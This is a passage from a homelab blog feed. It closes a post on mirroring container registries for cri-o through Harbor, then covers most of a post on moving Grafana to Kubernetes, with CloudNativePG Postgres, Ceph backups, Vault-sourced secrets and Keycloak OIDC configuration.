<code>pkill --signal SIGHUP crio</code>, without any restarts.</p>
<p>The mirror configs all have a similar format. As an example, the config for
<code>registry.k8s.io</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-toml" data-lang="toml"><span style="display:flex;"><span>[[<span style="color:#a6e22e">registry</span>]]
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">prefix</span> = <span style="color:#e6db74">&#34;registry.k8s.io&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">insecure</span> = <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">blocked</span> = <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">location</span> = <span style="color:#e6db74">&#34;registry.k8s.io&#34;</span>
</span></span><span style="display:flex;"><span>[[<span style="color:#a6e22e">registry</span>.<span style="color:#a6e22e">mirror</span>]]
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">location</span> = <span style="color:#e6db74">&#34;harbor.example.com/k8s-cache&#34;</span>
</span></span></code></pre></div><p>I place that file into <code>/etc/containers/registries.conf.d/k8s-mirror.conf</code>,
issue a SIGHUP, and cri-o will happily start pulling from the Harbor mirror
whenever an image from the official k8s registry is required. And like Docker,
it will pull from the original registry if the mirror is down.</p>
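<p>As a compact recap, with the file name and the test image being nothing more
than examples:</p>
<pre tabindex="0"><code># Drop the mirror config in place and reload cri-o
sudo cp k8s-mirror.conf /etc/containers/registries.conf.d/k8s-mirror.conf
sudo pkill --signal SIGHUP crio

# Pull a small image from registry.k8s.io; it should now be served via the Harbor mirror
sudo crictl pull registry.k8s.io/pause:3.9
</code></pre>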
<p>And with that, my container registry needs are fully migrated to Kubernetes
with Harbor. Especially the request-rewriting piece, getting a DockerHub
mirror for Docker daemons working against Harbor, was interesting to figure out and very
satisfying to get working.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 10: Grafana</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-10-grafana/</link>
      <pubDate>Sat, 06 Apr 2024 21:10:25 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-10-grafana/</guid>
      <description>Running Grafana with the kube-prometheus-stack chart</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Grafana instance over to k8s.</p>
<p>This is part 10 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I already wrote about my love for metrics in the companion post about the
<a href="https://blog.mei-home.net/posts/k8s-migration-9-prometheus/">Prometheus setup</a>, so I will
spare you my excitement about pretty graphs this time. &#x1f609;</p>
<p>For the Grafana setup, I used the <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack&rsquo;s</a>
integration of the <a href="https://github.com/grafana/helm-charts/tree/main/charts/grafana">Grafana Helm Chart</a>.</p>
<h2 id="database-setup">Database setup</h2>
<p>The first step is to set up the database for Grafana. You can also run it without
an external database, in which case Grafana uses a local SQLite DB. But a Postgres
database made more sense to me. This was my first deployment of a production
database with <a href="https://cloudnative-pg.io/">CloudNativePG</a> and looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:16.2-10&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;20&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;25MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;75MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;6400kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;768kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;640kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-backup-example-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-backup-example-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span></code></pre></div><p>As before, I determined the <code>spec.postgresql.parameters</code> by plugging my requirements
into <a href="https://pgtune.leopard.in.ua/">PGtune</a>. One important piece is the
<code>storage.size</code> config. I got that value wrong in the beginning, setting it to
only 256 MB. More details can be found in <a href="https://blog.mei-home.net/posts/k8s-migration-8a-pg-problems/">this post</a>.</p>
<p>I also configured backups via my Ceph Rook cluster and had to create an S3 bucket
user like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-example-user</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;Backup user for Grafana DB&#34;</span>
</span></span></code></pre></div><p>I also configured scheduled backups for the database:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span></code></pre></div><p>And finally, the CloudNativePG operator needs access to the Postgres pods
when using NetworkPolicies:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;grafana-pg-cluster-allow-operator-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cnpg.io/cluster</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">cloudnative-pg</span>
</span></span></code></pre></div><p>With the database finally up and running, and all the kinks worked out, I could
deploy Grafana itself.</p>
<h2 id="grafana-setup">Grafana setup</h2>
<p>Before beginning the Grafana setup itself, I had to go over to Keycloak to add
a new client, as I was changing the Grafana URL as part of the migration.
The Grafana doc has a good example for setting up OIDC <a href="https://grafana.com/docs/grafana/latest/setup-grafana/configure-security/configure-authentication/keycloak/">here</a>,
so I won&rsquo;t go into details.</p>
<p>To supply the OIDC secret and client name to the Grafana deployment, I stored
them in my HashiCorp Vault instance and grabbed them from there via
<a href="https://external-secrets.io/latest/">external-secrets</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;grafana-oauth2-keycloak&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret</span>: <span style="color:#e6db74">&#34;{{ .secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">client</span>: <span style="color:#e6db74">&#34;{{ .client }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">extract</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/grafana-oauth2-secrets</span>
</span></span></code></pre></div><p>On to the main event. As noted above, I&rsquo;m deploying the Grafana Helm chart as
a subchart of the kube-prometheus-stack chart, which I previously used to deploy
Prometheus:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">defaultDashboardsTimezone</span>: <span style="color:#ae81ff">Europe/Berlin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">defaultDashboardsEditable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidecar</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">alertmanager</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">testFramework</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">grafana.example.com</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">250m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256M</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;admin-secret-name&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">userKey</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">passwordKey</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraSecretMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">grafana-oauth2-keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/secrets/oauth-keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">db-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">grafana-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/secrets/my-db</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">editable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-k8s</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://loki.loki.svc.cluster.local:3100</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">grafana.ini</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">analytics</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">check_for_updates</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">root_url</span>: <span style="color:#ae81ff">https://grafana.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">postgres</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/host}:$__file{/secrets/my-db/port}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/dbname}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/user}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/password}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_sign_up</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">log</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">level</span>: <span style="color:#ae81ff">info</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">log.console</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">format</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alerting</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth.generic_oauth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_sign_up</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">skip_org_role_sync</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">client_id</span>: <span style="color:#e6db74">&#34;$__file{/secrets/oauth-keycloak/client}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">client_secret</span>: <span style="color:#e6db74">&#34;$__file{/secrets/oauth-keycloak/secret}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">scopes</span>: <span style="color:#ae81ff">openid email profile offline_access roles</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">email_attribute_path</span>: <span style="color:#ae81ff">email</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">login_attribute_path</span>: <span style="color:#ae81ff">username</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_attribute_path</span>: <span style="color:#ae81ff">full_name</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth_url</span>: <span style="color:#ae81ff">https://keycloak.example.com/realms/my-realm/protocol/openid-connect/auth</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">token_url</span>: <span style="color:#ae81ff">https://keycloak.example.com/realms/my-realm/protocol/openid-connect/token</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">api_url</span>: <span style="color:#ae81ff">https://keycloak.example.com/realms/my-realm/protocol/openid-connect/userinfo</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">role_attribute_path</span>: <span style="color:#ae81ff">contains(roles[*], &#39;admin&#39;) &amp;&amp; &#39;Admin&#39; || contains(roles[*], &#39;editor&#39;) &amp;&amp; &#39;Editor&#39; || &#39;Viewer&#39;</span>
</span></span></code></pre></div><p>Let&rsquo;s start with an obvious one: I&rsquo;m yet again disabling alerting and Grafana&rsquo;s
own ServiceMonitor, because I did not want to get bogged down even more in staring
at pretty plots all evening long. &#x1f605;
I&rsquo;ve got the persistence disabled, because I&rsquo;m using a Postgres database. Be
cautious with this - if persistence is disabled and you don&rsquo;t configure an external
database, your Grafana config and dashboards won&rsquo;t survive a Pod restart!</p>
<p>Next, let&rsquo;s look at the <code>admin</code> config. I went with an existing secret here, to
not have to put a password into the Helm chart directly. This password is important,
because it&rsquo;s not just Grafana&rsquo;s initial password, but it&rsquo;s also used by Grafana&rsquo;s
<a href="https://grafana.com/docs/grafana/latest/administration/provisioning/">Provisioning functionality</a>,
for API access. There is also a formatting issue somewhere with the password. If
it contains special characters, you will run into issues with not being able to
log in as the admin, and the dashboard and data source provisioning containers
failing to do their job because they also can&rsquo;t log in. I&rsquo;m not sure which
particular special character Grafana did not like, but logins failed consistently
with my completely randomly generated 100 character password. Switching to a
purely alphanumeric one fixed the issue.</p>
<p>One would think we would have gotten past the &ldquo;Escaping strings is hard!!!&rdquo; phase
of computing by now. &#x1f644;</p>
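<p>In the end I created the admin secret with a purely alphanumeric password,
roughly along these lines. The secret name matches the <code>existingSecret</code>
value from the chart config above; the namespace and password length are just
examples:</p>
<pre tabindex="0"><code># Generate an alphanumeric password and store it in the secret the chart expects
kubectl -n monitoring create secret generic admin-secret-name \
  --from-literal=user=admin \
  --from-literal=password=&#34;$(tr -dc &#39;A-Za-z0-9&#39; &lt;/dev/urandom | head -c 48)&#34;
</code></pre>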
<p>I will go into the <code>datasources</code> config a bit later when I talk about Grafana&rsquo;s
provisioning capability.</p>
<h3 id="grafana-config">Grafana config</h3>
<p>Now let&rsquo;s have a look at the Grafana config. The first thing to note is the
<code>$__file{&lt;FILEPATH&gt;}</code> syntax. This is a pretty nice Grafana feature. Instead of
having to write things into environment variables, Grafana can read values for
its config from other files. I&rsquo;m using
that for the Postgres database config as well as the OIDC secrets from Keycloak.</p>
<p>When a secret is mounted as a volume, Kubernetes creates one file per key
under the secret&rsquo;s <code>data:</code>. My database secret, automatically generated
by CloudNativePG, looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">host</span>: <span style="color:#ae81ff">grafana-pg-cluster-rw</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jdbc-uri</span>: <span style="color:#ae81ff">jdbc:postgresql://grafana-pg-cluster-rw:5432/grafana?password=foo&amp;user=grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#ae81ff">foo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgpass</span>: [<span style="color:#ae81ff">...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">uri</span>: <span style="color:#ae81ff">postgresql://grafana:foo@grafana-pg-cluster-rw:5432/grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">username</span>: <span style="color:#ae81ff">grafana</span>
</span></span></code></pre></div><p>This means that under <code>/secrets/my-db/</code>, where I mounted the secret, I will have
files like <code>dbname</code>, <code>password</code> or <code>uri</code>, which I can then use with the <code>$__file</code>
syntax to put them into Grafana&rsquo;s config file.</p>
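<p>For completeness, this is roughly how that secret gets mounted in the first place, via the
Grafana chart&rsquo;s <code>extraSecretMounts</code> option. Again a sketch - the secret name
(CloudNativePG&rsquo;s generated app secret in my case) and the mount path are placeholders:</p>
<pre tabindex="0"><code>extraSecretMounts:
  - name: grafana-pg-credentials
    secretName: grafana-pg-cluster-app
    mountPath: /secrets/my-db
    readOnly: true
</code></pre>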
<p>One note on the <code>uri</code> key, which CloudNativePG provides and which Grafana generally
supports instead of setting all the options separately: sadly, the URI provided by
